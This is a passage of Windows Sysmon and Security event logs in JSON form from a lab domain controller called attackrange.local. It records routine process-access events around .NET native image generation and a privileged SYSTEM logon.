ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:35.866","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2340","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-224F-5F25-0000-0010A6310D00}","TargetProcessId":"5064","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:37","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:35","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7352,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:35.866\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-224F-5F25-0000-0010A6310D00}\r\nTargetProcessId: 5064\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:35.866","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-224F-5F25-0000-0010A6310D00}","TargetProcessId":"5064","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:37","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:35","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7353,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:35.898\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-224F-5F25-0000-001070350D00}\r\nTargetProcessId: 4800\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:35.898","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-224F-5F25-0000-001070350D00}","TargetProcessId":"4800","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:37","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:35","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7354,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:35.898\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2336\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-224F-5F25-0000-001070350D00}\r\nTargetProcessId: 4800\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:35.898","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2336","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-224F-5F25-0000-001070350D00}","TargetProcessId":"4800","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:37","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:35","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7355,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:35.913\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-224F-5F25-0000-001070350D00}\r\nTargetProcessId: 4800\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:35.913","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-224F-5F25-0000-001070350D00}","TargetProcessId":"4800","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:37","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:36","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7356,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:36.210\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-2238-5F25-0000-001099B80B00}\r\nTargetProcessId: 4504\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:36.210","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-2238-5F25-0000-001099B80B00}","TargetProcessId":"4504","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:37","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:36","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7357,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:36.210\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2336\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2238-5F25-0000-001099B80B00}\r\nTargetProcessId: 4504\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:36.210","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2336","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2238-5F25-0000-001099B80B00}","TargetProcessId":"4504","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:37","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:36","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7358,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:36.210\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-2238-5F25-0000-001099B80B00}\r\nTargetProcessId: 4504\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:36.210","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-2238-5F25-0000-001099B80B00}","TargetProcessId":"4504","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:37","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:36","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220713,"ProcessID":864,"ThreadID":3168,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0xD3D23\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"WIN-DC-6178966$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0xd3d23","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","EventReceivedTime":"2020-08-01 08:05:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
